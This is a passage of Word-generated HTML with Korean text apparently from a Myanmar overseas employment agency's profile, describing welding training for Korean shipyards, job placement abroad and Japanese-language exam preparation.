Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 현재에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">한국</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소들에 일하고 싶은 미얀마</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각지에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">온</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">소수민족</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">형제들을 교통통신부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산하</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike)</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에 트레이너들와 함께 훌령한 기능공이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">되도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">용접수업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있으며</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업할 수 있게 취업들을 연계시키고 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun 